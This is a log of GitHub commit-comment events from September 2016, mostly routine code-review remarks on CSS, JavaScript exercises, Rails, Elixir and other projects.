{"id":"4621735593","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"kellykor/relaxr-landing-page"},"payload":{"comment":{"id":19184160,"position":138,"line":138,"path":"css/style.css","commit_id":"75a6828c273f69a2be3009ad3ff2f98470e8804a","created_at":"2016-09-27T03:15:32Z","updated_at":"2016-09-27T03:15:32Z","body":"Hmm, did you mean to set 50% here? It's rendering visually correct but it doens't seem right..."}},"created_at":"2016-09-27T03:15:32Z"}
{"id":"4621735753","type":"CommitCommentEvent","actor":{"login":"willpatera"},"repo":{"name":"nathakits/pupil-labs-website"},"payload":{"comment":{"id":19184161,"position":5,"line":13,"path":"contents/articles/2016-02_pupil-for-hmd/index.md","commit_id":"eb1928339cd5b5b164b28a3315c640ccbd32d87b","created_at":"2016-09-27T03:15:36Z","updated_at":"2016-09-27T03:15:36Z","body":"This change should be in another branch."}},"created_at":"2016-09-27T03:15:36Z"}
{"id":"4621739349","type":"CommitCommentEvent","actor":{"login":"willpatera"},"repo":{"name":"nathakits/pupil-labs-website"},"payload":{"comment":{"id":19184176,"position":null,"line":null,"path":null,"commit_id":"3e51d45e10a91b575e1187a222ebd5d19e1afeea","created_at":"2016-09-27T03:17:06Z","updated_at":"2016-09-27T03:17:06Z","body":"_The Information_ should be italic (emphasis). "}},"created_at":"2016-09-27T03:17:06Z"}
{"id":"4621739452","type":"CommitCommentEvent","actor":{"login":"xihuishan"},"repo":{"name":"xihuishan/clawer"},"payload":{"comment":{"id":19184178,"position":null,"line":null,"path":null,"commit_id":"79c65b5fdbec30cbe8d2388d500ac26783de88ac","created_at":"2016-09-27T03:17:09Z","updated_at":"2016-09-27T03:17:09Z","body":"测试"}},"created_at":"2016-09-27T03:17:09Z"}
{"id":"4621741543","type":"CommitCommentEvent","actor":{"login":"willpatera"},"repo":{"name":"nathakits/pupil-labs-website"},"payload":{"comment":{"id":19184181,"position":null,"line":null,"path":null,"commit_id":"3e51d45e10a91b575e1187a222ebd5d19e1afeea","created_at":"2016-09-27T03:17:59Z","updated_at":"2016-09-27T03:17:59Z","body":"Remove \r\n\r\n>In part due to expensive cost of purchusing eye tracking hardware and software but also that it hasn't found a place in the consumer market yet. And now where more efficient fabrication and prototyping tools with smaller and cheaper components is pushing eye tracking to become more of a mainstream technology."}},"created_at":"2016-09-27T03:17:59Z"}
{"id":"4621743431","type":"CommitCommentEvent","actor":{"login":"kijin"},"repo":{"name":"kijin/xe-supercache"},"payload":{"comment":{"id":19184184,"position":4,"line":312,"path":"supercache.model.php","commit_id":"d0841882bf1824b95529a7584730550cf58473ae","created_at":"2016-09-27T03:18:45Z","updated_at":"2016-09-27T03:18:45Z","body":"PHP 내장 함수인데 그냥 주어진 문자열을 정확하게 에러로그에 박아버립니다. XE의 debugPrint와 달리 배열이나 객체는 알아듣지 못하죠. 그래서 임시방편으로 json_encode ㅋㅋㅋ"}},"created_at":"2016-09-27T03:18:45Z"}
{"id":"4621746102","type":"CommitCommentEvent","actor":{"login":"reynaldo02"},"repo":{"name":"Wurst-Imperium/wurst-client.tk"},"payload":{"comment":{"id":19184191,"position":null,"line":null,"path":null,"commit_id":"659b107faeb302a76088c5db13b7c5c37cf68a00","created_at":"2016-09-27T03:19:48Z","updated_at":"2016-09-27T03:19:48Z","body":"hola\r\n"}},"created_at":"2016-09-27T03:19:48Z"}
{"id":"4621746143","type":"CommitCommentEvent","actor":{"login":"Serneum"},"repo":{"name":"ElixirCLE/nemestats_client"},"payload":{"comment":{"id":19184192,"position":12,"line":11,"path":"lib/nemestats_client.ex","commit_id":"716941124ba9da5c390977d1583b285a385f62f3","created_at":"2016-09-27T03:19:49Z","updated_at":"2016-09-27T03:19:49Z","body":"I'm still not sure why this doesn't work. I get\r\n```\r\n%HTTPotion.Response{body: {:error, :badarg},\r\n headers: %HTTPotion.Headers{hdrs: [\"cache-control\": \"no-cache\",\r\n   \"cf-ray\": \"2e8b8de55bb856ed-IAD\", connection: \"keep-alive\",\r\n   \"content-type\": \"application/json; charset=utf-8\",\r\n   date: \"Tue, 27 Sep 2016 02:34:02 GMT\", expires: \"-1\", pragma: \"no-cache\",\r\n   server: \"cloudflare-nginx\",\r\n   \"set-cookie\": [\"ARRAffinity=f5e3ec32b7b8f8b8994de193698aa9f29deaffc69a6f03b1581f9d27e3521fba;Path=/;Domain=nemestats.com\",\r\n    \"__cfduid=d540648da433a0ba66f44a76044662ec51474943642; expires=Wed, 27-Sep-17 02:34:02 GMT; path=/; domain=.nemestats.com; HttpOnly\"],\r\n   \"transfer-encoding\": \"chunked\", vary: \"Accept-Encoding\",\r\n   \"x-aspnet-version\": \"4.0.30319\", \"x-powered-by\": \"ASP.NET\"]},\r\n status_code: 200}\r\n```"}},"created_at":"2016-09-27T03:19:49Z"}
{"id":"4621746308","type":"CommitCommentEvent","actor":{"login":"willpatera"},"repo":{"name":"nathakits/pupil-labs-website"},"payload":{"comment":{"id":19184193,"position":null,"line":null,"path":null,"commit_id":"3e51d45e10a91b575e1187a222ebd5d19e1afeea","created_at":"2016-09-27T03:19:52Z","updated_at":"2016-09-27T03:19:52Z","body":"Remove: \r\n\r\n> Pupil's commitment is making accessible and open eye tracking tools.\r\n\r\n"}},"created_at":"2016-09-27T03:19:52Z"}
{"id":"4621746554","type":"CommitCommentEvent","actor":{"login":"kocio-pl"},"repo":{"name":"gravitystorm/openstreetmap-carto"},"payload":{"comment":{"id":19184194,"position":null,"line":null,"path":null,"commit_id":"02b10e2d7660134f7067af45eaafb235a52c6820","created_at":"2016-09-27T03:19:57Z","updated_at":"2016-09-27T03:19:57Z","body":"Ok, so this changelog has been correctly updated, but in lua branch instead of master."}},"created_at":"2016-09-27T03:19:57Z"}
{"id":"4621748577","type":"CommitCommentEvent","actor":{"login":"reynaldo02"},"repo":{"name":"Wurst-Imperium/wurst-client.tk"},"payload":{"comment":{"id":19184198,"position":null,"line":null,"path":null,"commit_id":"659b107faeb302a76088c5db13b7c5c37cf68a00","created_at":"2016-09-27T03:20:45Z","updated_at":"2016-09-27T03:20:45Z","body":"659b107"}},"created_at":"2016-09-27T03:20:45Z"}
{"id":"4621748829","type":"CommitCommentEvent","actor":{"login":"Serneum"},"repo":{"name":"ElixirCLE/nemestats_client"},"payload":{"comment":{"id":19184201,"position":15,"line":14,"path":"lib/nemestats_client.ex","commit_id":"716941124ba9da5c390977d1583b285a385f62f3","created_at":"2016-09-27T03:20:50Z","updated_at":"2016-09-27T03:20:50Z","body":"I'm not sure how to handle this:\r\n```\r\niex(2)> NemeStatsClient.login(\"crees\", \"REDACTED\")[:authenticationToken]\r\n<<79, 14, 195, 131, 16, 195, 187, 195, 135, 90, 79, 110, 194, 191, 57, 46, 195,\r\n  145, 72, 117, 195, 148, 57, 91, 195, 128, 195, 180>>\r\n```"}},"created_at":"2016-09-27T03:20:50Z"}
{"id":"4621749140","type":"CommitCommentEvent","actor":{"login":"barijaona"},"repo":{"name":"barijaona/CLOVER_GA-Z170X-Gaming5"},"payload":{"comment":{"id":19184202,"position":null,"line":null,"path":null,"commit_id":"dd8acc6c8de2104913653a970ae6d8183d3ef062","created_at":"2016-09-27T03:20:57Z","updated_at":"2016-09-27T03:20:57Z","body":"I don't know anything about your config, but I doubt the two problems have the same causes.\r\n\r\nI suggest you have a look at this thread : http://www.insanelymac.com/forum/topic/208410-fixing-scrambledstretched-or-wrong-resolution-laptop-display-problems/\r\n\r\nBy the way, I stopped using the above mentioned technique, as it does not work anymore in Sierra.\r\n\r\n"}},"created_at":"2016-09-27T03:20:57Z"}
{"id":"4621752093","type":"CommitCommentEvent","actor":{"login":"reynaldo02"},"repo":{"name":"Wurst-Imperium/wurst-client.tk"},"payload":{"comment":{"id":19184206,"position":null,"line":null,"path":null,"commit_id":"659b107faeb302a76088c5db13b7c5c37cf68a00","created_at":"2016-09-27T03:22:08Z","updated_at":"2016-09-27T03:22:08Z","body":"hoola"}},"created_at":"2016-09-27T03:22:08Z"}
{"id":"4621753739","type":"CommitCommentEvent","actor":{"login":"Serneum"},"repo":{"name":"ElixirCLE/nemestats_client"},"payload":{"comment":{"id":19184210,"position":null,"line":null,"path":null,"commit_id":"716941124ba9da5c390977d1583b285a385f62f3","created_at":"2016-09-27T03:22:45Z","updated_at":"2016-09-27T03:22:45Z","body":"@daveshah I'm curious if you have any thoughts on this or if you have used other HTTP/JSON libraries and have ideas on what might be wrong"}},"created_at":"2016-09-27T03:22:45Z"}
{"id":"4621757874","type":"CommitCommentEvent","actor":{"login":"reynaldo02"},"repo":{"name":"Wurst-Imperium/wurst-client.tk"},"payload":{"comment":{"id":19184265,"position":null,"line":null,"path":null,"commit_id":"659b107faeb302a76088c5db13b7c5c37cf68a00","created_at":"2016-09-27T03:24:28Z","updated_at":"2016-09-27T03:24:28Z","body":"![images](https://cloud.githubusercontent.com/assets/22463370/18859246/fb2b419e-8437-11e6-90ae-a69336aef7b2.jpg)\r\n"}},"created_at":"2016-09-27T03:24:28Z"}
{"id":"4621759284","type":"CommitCommentEvent","actor":{"login":"tpaviot"},"repo":{"name":"tpaviot/pythonocc-core"},"payload":{"comment":{"id":19184269,"position":null,"line":null,"path":null,"commit_id":"2dde9549c86226753aefde70a595f2e90a36ef79","created_at":"2016-09-27T03:25:04Z","updated_at":"2016-09-27T03:25:04Z","body":"@jf--- you're right, it's more a unittest. I will add your example to this branch"}},"created_at":"2016-09-27T03:25:04Z"}
{"id":"4621760426","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"bamsrud01/rho_code_challenge_1"},"payload":{"comment":{"id":19184270,"position":20,"line":17,"path":"4-arrays/builtins.js","commit_id":"d72f40b5fc68150468926ae9357976b0b261c3c2","created_at":"2016-09-27T03:25:35Z","updated_at":"2016-09-27T03:25:35Z","body":"Nice use of a named function."}},"created_at":"2016-09-27T03:25:35Z"}
{"id":"4621761579","type":"CommitCommentEvent","actor":{"login":"helperhaps"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19184272,"position":null,"line":null,"path":null,"commit_id":"fb42c492a7eff58f45867ea50440d938648cdb48","created_at":"2016-09-27T03:26:00Z","updated_at":"2016-09-27T03:26:00Z","body":"Couse the default generate method of uuid is uuid_generate_v4 (ref:https://github.com/rails/rails/issues/20518) ,when use postgresql's pgcrypto extension, the migration will failed with `function uuid_generate_v4() does not exist` obviously. To fix that need to edit the edit phase by hands (add \" default: 'gen_random_uuid()' by hands\")\r\n\r\n```ruby\r\ncreate_table :tables, id: :uuid, default: 'gen_random_uuid()' do |t|\r\n```\r\n\r\nSo if use pgcrypto to generate uuid, \r\n\r\n```ruby\r\nconfig.generators do |g|\r\n    g.orm :active_record, primary_key_type: :uuid\r\nend\r\n```\r\nthis is not so good, why not make it like \r\n\r\n```ruby\r\nconfig.generators do |g|\r\n    g.orm :active_record, primary_key_type: :uuid, generate_method: 'gen_random_uuid()'\r\nend\r\n```\r\n\r\nOr it can handle that but i did't find?"}},"created_at":"2016-09-27T03:26:00Z"}
{"id":"4621761588","type":"CommitCommentEvent","actor":{"login":"zhongxia245"},"repo":{"name":"openatx/atx-webide"},"payload":{"comment":{"id":19184273,"position":null,"line":null,"path":null,"commit_id":"69b478a8100789821db4164b2fb0982f9a4c0eb1","created_at":"2016-09-27T03:26:02Z","updated_at":"2016-09-27T03:26:02Z","body":"Thanks !  now is resolve this bug！"}},"created_at":"2016-09-27T03:26:02Z"}
{"id":"4621763251","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"bamsrud01/rho_code_challenge_1"},"payload":{"comment":{"id":19184278,"position":21,"line":18,"path":"5-functions/func.js","commit_id":"da87b3f50b1fd71fc32e4fc8f034e87dcf9eee41","created_at":"2016-09-27T03:26:38Z","updated_at":"2016-09-27T03:26:38Z","body":"This question is asking for a function declaration; this could be written as:\r\n\r\n```JS\r\nfunction divide(num) {\r\n  return num / 2;\r\n}\r\n```"}},"created_at":"2016-09-27T03:26:38Z"}
{"id":"4621764336","type":"CommitCommentEvent","actor":{"login":"artem-malko"},"repo":{"name":"alex-pol/tars"},"payload":{"comment":{"id":19184290,"position":17,"line":222,"path":"tars/tasks/html/helpers/handlebars-helpers.js","commit_id":"c461ef9efb070d52b61d3b9af1f6befc3ce0bff9","created_at":"2016-09-27T03:27:06Z","updated_at":"2016-09-27T03:27:06Z","body":"Лучше было написать свой хелпер. Он бы не затерся в результате обновления)"}},"created_at":"2016-09-27T03:27:06Z"}
{"id":"4621770714","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19184305,"position":null,"line":null,"path":null,"commit_id":"8d5af01694cff43868a08218065b102ec05987d6","created_at":"2016-09-27T03:29:44Z","updated_at":"2016-09-27T03:29:44Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=82)"}},"created_at":"2016-09-27T03:29:44Z"}
{"id":"4621770723","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19184306,"position":null,"line":null,"path":null,"commit_id":"3ce2c6277a7b64975b4d0d8b37bad09ee628be4c","created_at":"2016-09-27T03:29:44Z","updated_at":"2016-09-27T03:29:44Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=82)"}},"created_at":"2016-09-27T03:29:44Z"}
{"id":"4621770917","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19184307,"position":null,"line":null,"path":null,"commit_id":"18819d138e610d8658b5e57e19d2c83e30915957","created_at":"2016-09-27T03:29:48Z","updated_at":"2016-09-27T03:29:48Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=82)"}},"created_at":"2016-09-27T03:29:48Z"}
{"id":"4621772247","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":19184312,"position":null,"line":null,"path":null,"commit_id":"5e7bb5c9ea86caf350d9f580bea3276be9431f05","created_at":"2016-09-27T03:30:20Z","updated_at":"2016-09-27T03:30:20Z","body":"travis 挂了"}},"created_at":"2016-09-27T03:30:20Z"}
{"id":"4621773017","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"connorghauck/rho_code_challenge_1"},"payload":{"comment":{"id":19184313,"position":7,"line":7,"path":"2-loops/all_your_loops.js","commit_id":"bf131e66d131b9f9cbea90eaf965e67d256fbbad","created_at":"2016-09-27T03:30:38Z","updated_at":"2016-09-27T03:30:38Z","body":"This loop only runs 4 times, if you follow the pattern of \r\n```JS\r\nfor ( var i = initialValue; i < finalValue; i++) ...\r\n```\r\nthe loop will always run `finalValue - initialValue` times and `i` will always end at `finalValue`."}},"created_at":"2016-09-27T03:30:38Z"}
{"id":"4621775643","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"connorghauck/rho_code_challenge_1"},"payload":{"comment":{"id":19184321,"position":10,"line":10,"path":"4-arrays/builtins.js","commit_id":"bf131e66d131b9f9cbea90eaf965e67d256fbbad","created_at":"2016-09-27T03:31:43Z","updated_at":"2016-09-27T03:31:43Z","body":"Don't worry about this question, this was intended to be extra credit. We can discuss possible solutions in class."}},"created_at":"2016-09-27T03:31:43Z"}
{"id":"4621776146","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"connorghauck/rho_code_challenge_1"},"payload":{"comment":{"id":19184323,"position":4,"line":4,"path":"4-arrays/index.html","commit_id":"bf131e66d131b9f9cbea90eaf965e67d256fbbad","created_at":"2016-09-27T03:31:55Z","updated_at":"2016-09-27T03:31:55Z","body":"Good job testing your code!"}},"created_at":"2016-09-27T03:31:55Z"}
{"id":"4621778285","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"connorghauck/rho_code_challenge_1"},"payload":{"comment":{"id":19184327,"position":14,"line":14,"path":"5-functions/func.js","commit_id":"bf131e66d131b9f9cbea90eaf965e67d256fbbad","created_at":"2016-09-27T03:32:50Z","updated_at":"2016-09-27T03:32:50Z","body":"This question is looking for a function expression; this could be written as:\r\n\r\n```JS\r\nvar oneArgument = function(p1) {\r\n  console.log(p1);\r\n}\r\n```"}},"created_at":"2016-09-27T03:32:50Z"}
{"id":"4621779797","type":"CommitCommentEvent","actor":{"login":"xHN35RQ"},"repo":{"name":"xHN35RQ/apprentice-colorschemes"},"payload":{"comment":{"id":19184332,"position":null,"line":null,"path":null,"commit_id":"12474c80fd7b0d990c84eaa4c9a18477197d9dae","created_at":"2016-09-27T03:33:26Z","updated_at":"2016-09-27T03:33:26Z","body":"because i don't have the right to add a license file in the first place"}},"created_at":"2016-09-27T03:33:26Z"}
{"id":"4621779839","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/relaxr-landing-page"},"payload":{"comment":{"id":19184333,"position":78,"line":78,"path":"css/style.css","commit_id":"c622472dae45bdd4e9d91192cee73f813c98448c","created_at":"2016-09-27T03:33:27Z","updated_at":"2016-09-27T03:33:27Z","body":"should be \"sans-serif\"."}},"created_at":"2016-09-27T03:33:27Z"}
{"id":"4621780385","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/relaxr-landing-page"},"payload":{"comment":{"id":19184335,"position":86,"line":86,"path":"css/style.css","commit_id":"c622472dae45bdd4e9d91192cee73f813c98448c","created_at":"2016-09-27T03:33:41Z","updated_at":"2016-09-27T03:33:41Z","body":"should be \"sans-serif\""}},"created_at":"2016-09-27T03:33:41Z"}
{"id":"4621781609","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/relaxr-landing-page"},"payload":{"comment":{"id":19184339,"position":111,"line":111,"path":"css/style.css","commit_id":"c622472dae45bdd4e9d91192cee73f813c98448c","created_at":"2016-09-27T03:34:10Z","updated_at":"2016-09-27T03:34:10Z","body":"should be \"sans-serif\""}},"created_at":"2016-09-27T03:34:10Z"}
{"id":"4621782443","type":"CommitCommentEvent","actor":{"login":"willpatera"},"repo":{"name":"CherryChu/pupil"},"payload":{"comment":{"id":19184341,"position":75,"line":59,"path":"pupil_src/player/raw_data_exporter.py","commit_id":"5852dd4c3dd77141d9af0edc89f4f903be690f91","created_at":"2016-09-27T03:34:29Z","updated_at":"2016-09-27T03:34:29Z","body":"@CherryChu - `rec_dir` is accessible via `self.g_pool.rec_dir`\r\n\r\nYou can see where `rec_dir` is added to `g_pool` in `player/main.py` [here](https://github.com/CherryChu/pupil/blob/master/pupil_src/player/main.py#L231)"}},"created_at":"2016-09-27T03:34:29Z"}
{"id":"4621782806","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"connorghauck/rho_code_challenge_1"},"payload":{"comment":{"id":19184343,"position":22,"line":22,"path":"6-objects/literal.js","commit_id":"bf131e66d131b9f9cbea90eaf965e67d256fbbad","created_at":"2016-09-27T03:34:38Z","updated_at":"2016-09-27T03:34:38Z","body":"This is the right idea, now you just need to add it to the prime object with a line like: `prime.print = print;` and replace the references to `prime` in the body of the function with `this`"}},"created_at":"2016-09-27T03:34:38Z"}
{"id":"4621784506","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/relaxr-landing-page"},"payload":{"comment":{"id":19184345,"position":125,"line":125,"path":"css/style.css","commit_id":"c622472dae45bdd4e9d91192cee73f813c98448c","created_at":"2016-09-27T03:35:22Z","updated_at":"2016-09-27T03:35:22Z","body":"To center align this, you should give it a width and margin-left and margin-right of auto."}},"created_at":"2016-09-27T03:35:22Z"}
{"id":"4621785059","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/relaxr-landing-page"},"payload":{"comment":{"id":19184348,"position":138,"line":138,"path":"css/style.css","commit_id":"c622472dae45bdd4e9d91192cee73f813c98448c","created_at":"2016-09-27T03:35:35Z","updated_at":"2016-09-27T03:35:35Z","body":"To center align this, you should give it a width and margin-left and margin-right of auto."}},"created_at":"2016-09-27T03:35:35Z"}
{"id":"4621785734","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/relaxr-landing-page"},"payload":{"comment":{"id":19184350,"position":166,"line":166,"path":"css/style.css","commit_id":"c622472dae45bdd4e9d91192cee73f813c98448c","created_at":"2016-09-27T03:35:52Z","updated_at":"2016-09-27T03:35:52Z","body":"should be \"sans-serif\""}},"created_at":"2016-09-27T03:35:52Z"}
{"id":"4621787880","type":"CommitCommentEvent","actor":{"login":"hmtanbir"},"repo":{"name":"BDMADE/college"},"payload":{"comment":{"id":19184365,"position":null,"line":null,"path":null,"commit_id":"9ba82800315cfdb514303dd2fa7f007404fb6996","created_at":"2016-09-27T03:36:43Z","updated_at":"2016-09-27T03:36:43Z","body":"Please remove this file."}},"created_at":"2016-09-27T03:36:43Z"}
{"id":"4621787892","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"emyl3/rho_code_challenge_1"},"payload":{"comment":{"id":19184366,"position":2,"line":2,"path":"1-variables/strings.js","commit_id":"18f3f8684eb04122e0148eaf2be8b9fb92027bbd","created_at":"2016-09-27T03:36:43Z","updated_at":"2016-09-27T03:36:43Z","body":"This is very minor, but when we say the empty string, we mean `''` without any whitespace. "}},"created_at":"2016-09-27T03:36:43Z"}
{"id":"4621788764","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/relaxr-landing-page"},"payload":{"comment":{"id":19184371,"position":175,"line":175,"path":"css/style.css","commit_id":"c622472dae45bdd4e9d91192cee73f813c98448c","created_at":"2016-09-27T03:37:05Z","updated_at":"2016-09-27T03:37:05Z","body":"You should've have made these \"inline-block\" and used `text-align: center;` on the outer container. (and remove the crazy margins)"}},"created_at":"2016-09-27T03:37:05Z"}
{"id":"4621791997","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"emyl3/rho_code_challenge_1"},"payload":{"comment":{"id":19184374,"position":15,"line":15,"path":"5-functions/func.js","commit_id":"18f3f8684eb04122e0148eaf2be8b9fb92027bbd","created_at":"2016-09-27T03:38:21Z","updated_at":"2016-09-27T03:38:21Z","body":"This question is looking for a function expression; this could be written as\r\n\r\n```JS\r\nvar consoleLogValue = function(value) {\r\n  console.log('Value of argument: ' + value);\r\n}\r\n```"}},"created_at":"2016-09-27T03:38:21Z"}
{"id":"4621792100","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/relaxr-landing-page"},"payload":{"comment":{"id":19184375,"position":36,"line":36,"path":"index.html","commit_id":"c622472dae45bdd4e9d91192cee73f813c98448c","created_at":"2016-09-27T03:38:24Z","updated_at":"2016-09-27T03:38:24Z","body":"hmm, the type attribute wasn't needed here."}},"created_at":"2016-09-27T03:38:24Z"}
{"id":"4621793814","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"sdpernick/relaxr-landing-page"},"payload":{"comment":{"id":19184380,"position":58,"line":58,"path":"index.html","commit_id":"c622472dae45bdd4e9d91192cee73f813c98448c","created_at":"2016-09-27T03:39:09Z","updated_at":"2016-09-27T03:39:09Z","body":"the type attribute wasn't needed here."}},"created_at":"2016-09-27T03:39:09Z"}
{"id":"4621798065","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"jtorborg/rho_code_challenge_1"},"payload":{"comment":{"id":19184386,"position":3,"line":5,"path":"4-arrays/builtins.js","commit_id":"086262feaabc2aa3fd0a39d0bcbe6597a0511762","created_at":"2016-09-27T03:40:54Z","updated_at":"2016-09-27T03:40:54Z","body":"It looks like you missed this question, it can be written as `arr.splice(1,2);`"}},"created_at":"2016-09-27T03:40:54Z"}
{"id":"4621800182","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"jtorborg/rho_code_challenge_1"},"payload":{"comment":{"id":19184393,"position":17,"line":18,"path":"4-arrays/builtins.js","commit_id":"086262feaabc2aa3fd0a39d0bcbe6597a0511762","created_at":"2016-09-27T03:41:47Z","updated_at":"2016-09-27T03:41:47Z","body":"Very close, you want to return this value instead of returning `arraycell`. This does not modify `arraycell`."}},"created_at":"2016-09-27T03:41:47Z"}
{"id":"4621802726","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"jtorborg/rho_code_challenge_1"},"payload":{"comment":{"id":19184397,"position":40,"line":40,"path":"5-functions/func.js","commit_id":"086262feaabc2aa3fd0a39d0bcbe6597a0511762","created_at":"2016-09-27T03:42:48Z","updated_at":"2016-09-27T03:42:48Z","body":"This one was trickily worded, we were looking for `console.log(monday(rhobot(10,20)));`"}},"created_at":"2016-09-27T03:42:48Z"}
{"id":"4621805837","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"jtorborg/rho_code_challenge_1"},"payload":{"comment":{"id":19184402,"position":30,"line":35,"path":"6-objects/literal.js","commit_id":"086262feaabc2aa3fd0a39d0bcbe6597a0511762","created_at":"2016-09-27T03:44:08Z","updated_at":"2016-09-27T03:44:08Z","body":"This works, and since we are only defining this method on the `prime` object it is ok. If we wanted to write this as a more general method for other objects, we would replace `prime` with `this`."}},"created_at":"2016-09-27T03:44:08Z"}
{"id":"4621807475","type":"CommitCommentEvent","actor":{"login":"mfoee"},"repo":{"name":"mfoee/Unity"},"payload":{"comment":{"id":19184405,"position":null,"line":null,"path":null,"commit_id":"4a0dbf541c24b673b1e2e493359b1a0620455396","created_at":"2016-09-27T03:44:49Z","updated_at":"2016-09-27T03:44:49Z","body":"Removed all unnecessary code."}},"created_at":"2016-09-27T03:44:49Z"}
{"id":"4621807540","type":"CommitCommentEvent","actor":{"login":"huynhquancam"},"repo":{"name":"huynhquancam/dotfiles"},"payload":{"comment":{"id":19184406,"position":null,"line":null,"path":null,"commit_id":"e9746b147a41795ca7dbe69323783dd5cb327cbb","created_at":"2016-09-27T03:44:51Z","updated_at":"2016-09-27T03:44:51Z","body":"**Note** Install tmux HEAD will fucking help"}},"created_at":"2016-09-27T03:44:51Z"}
{"id":"4621813158","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"StPaulStylee/rho_code_challenge_1"},"payload":{"comment":{"id":19184430,"position":9,"line":21,"path":"5-functions/func.js","commit_id":"f5a5c6772c928893699c0364e980012b9414cd72","created_at":"2016-09-27T03:47:13Z","updated_at":"2016-09-27T03:47:13Z","body":"We talked about this in person, but you switched around function declaration and function expression. "}},"created_at":"2016-09-27T03:47:13Z"}
{"id":"4621814036","type":"CommitCommentEvent","actor":{"login":"hriddle"},"repo":{"name":"hriddle/ios-course"},"payload":{"comment":{"id":19184432,"position":null,"line":null,"path":null,"commit_id":"68575e83b251424ea7a147790925536a85bee46d","created_at":"2016-09-27T03:47:35Z","updated_at":"2016-09-27T03:47:35Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create repository](https://trello.com/c/gDG2CQAc/19-create-repository)"}},"created_at":"2016-09-27T03:47:35Z"}
{"id":"4621814758","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"StPaulStylee/rho_code_challenge_1"},"payload":{"comment":{"id":19184434,"position":13,"line":25,"path":"5-functions/func.js","commit_id":"f5a5c6772c928893699c0364e980012b9414cd72","created_at":"2016-09-27T03:47:52Z","updated_at":"2016-09-27T03:47:52Z","body":"It can be written like this:\r\n\r\n```JS\r\nvar log = function(anything) {\r\n  console.log(anything);\r\n}\r\n```"}},"created_at":"2016-09-27T03:47:52Z"}
{"id":"4621816131","type":"CommitCommentEvent","actor":{"login":"paulkerschen"},"repo":{"name":"raydavis/calcentral"},"payload":{"comment":{"id":19184438,"position":6,"line":56,"path":"app/models/rosters/campus.rb","commit_id":"b3611e0e021bc6ac99191cc86568341d32e53277","created_at":"2016-09-27T03:48:26Z","updated_at":"2016-09-27T03:48:26Z","body":"@raydavis Nice catch. As long as we're cleaning house, I think the `!!` is superfluous since the ternary operator will cast to boolean anyway?"}},"created_at":"2016-09-27T03:48:26Z"}
{"id":"4621821849","type":"CommitCommentEvent","actor":{"login":"Reamer"},"repo":{"name":"Icinga/puppet-icinga2-rewrite"},"payload":{"comment":{"id":19184452,"position":123,"line":183,"path":"manifests/feature/api.pp","commit_id":"fc6b71da774ffa148c87fa6747ef4a2993867749","created_at":"2016-09-27T03:50:46Z","updated_at":"2016-09-27T03:50:46Z","body":"The path contains the path from puppetmaster and not from agent. So the path is not right if you have puppet 3 and puppet 4 agents mix. Maybe also windows agents have problems, but i doesn't use puppet on windows.\r\nhttps://docs.puppet.com/puppet/latest/reference/lang_facts_and_builtin_vars.html#puppet-master-variables\r\nTake a look into https://github.com/Icinga/puppet-icinga2/pull/197/"}},"created_at":"2016-09-27T03:50:46Z"}
{"id":"4621822367","type":"CommitCommentEvent","actor":{"login":"KTH9715"},"repo":{"name":"obscenesensi/STORAGE-project"},"payload":{"comment":{"id":19184457,"position":39,"line":39,"path":"README.md","commit_id":"dccffb2736e4a0b27cdf2d86c85b21f302473f14","created_at":"2016-09-27T03:51:00Z","updated_at":"2016-09-27T03:51:00Z","body":"asds"}},"created_at":"2016-09-27T03:51:00Z"}
{"id":"4621822516","type":"CommitCommentEvent","actor":{"login":"epureum"},"repo":{"name":"obscenesensi/STORAGE-project"},"payload":{"comment":{"id":19184459,"position":null,"line":null,"path":null,"commit_id":"310bcb462517682094c04ddc92bbe4ff25396dd0","created_at":"2016-09-27T03:51:04Z","updated_at":"2016-09-27T03:51:04Z","body":":)"}},"created_at":"2016-09-27T03:51:04Z"}
